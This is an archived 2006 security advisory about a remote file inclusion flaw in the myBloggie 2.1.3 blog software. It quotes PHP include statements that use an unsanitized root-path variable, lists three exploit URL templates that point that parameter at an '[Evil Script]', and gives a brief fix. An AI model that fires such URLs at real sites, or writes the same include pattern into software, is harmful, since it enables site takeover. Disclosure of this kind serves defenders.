TUCoPS :: Web :: Blogs :: b06-4162.htm

TUCoPS :: Web :: Blogs :: b06-4162.htm
myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability


-----------------------------------------------------------------------------------------=0D
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion=0D
-----------------------------------------------------------------------------------------=0D
Author   : Sh3ll=0D
Date     : 2006/04/29=0D
Location : Iran - Tehran=0D
HomePage : http://www.sh3ll.ir=0D 
Email    : sh3ll[at]sh3ll[dot]ir=0D
Critical Level : Dangerous=0D
-----------------------------------------------------------------------------------------=0D
Affected Software Description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
 =0D
Application : myBloggie=0D
version     : 2.1.3=0D
URL : http://www.mywebland.com , http://mybloggie.mywebland.com=0D 
Description : =0D
myBloggie is considered one of the most simple, user-friendliest yet packed=0D
with features Weblog system available to date.=0D
-----------------------------------------------------------------------------------------=0D
Vulnerabilities:=0D
~~~~~~~~~~~~~~~=0D
in admin.php , index.php & db.php We Found Vulnerability Scripts=0D
----------------------------------------admin.php----------------------------------------=0D
....=0D
=0D
...=0D
----------------------------------------index.php----------------------------------------=0D
....=0D
pparse('sidevert');=0D
}=0D
=0D
// End right sidemenu condition=0D
=0D
// Sidemenu menu items. You can change the menu item order here=0D
include($mybloggie_root_path.'calendar.php');=0D
include($mybloggie_root_path.'spacer.php');=0D
include($mybloggie_root_path.'category.php');=0D
include($mybloggie_root_path.'spacer.php');=0D
include($mybloggie_root_path.'recent.php');=0D
include($mybloggie_root_path.'spacer.php');=0D
include($mybloggie_root_path.'archives.php');=0D
include($mybloggie_root_path.'spacer.php');=0D
include($mybloggie_root_path.'user.php');=0D
include($mybloggie_root_path.'spacer.php');=0D
if ($search) {=0D
include($mybloggie_root_path.'searchform.php');=0D
include($mybloggie_root_path.'spacer.php');=0D
}=0D
...    =0D
=0D
-------------------------------------------db.php----------------------------------------=0D
....=0D
=0D
...=0D
-----------------------------------------------------------------------------------------=0D
Exploit:=0D
~~~~~~~=0D
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]=0D 
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]=0D 
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]=0D 
=0D
Solution:=0D
~~~~~~~~=0D
Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php=0D
-----------------------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena=0D
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams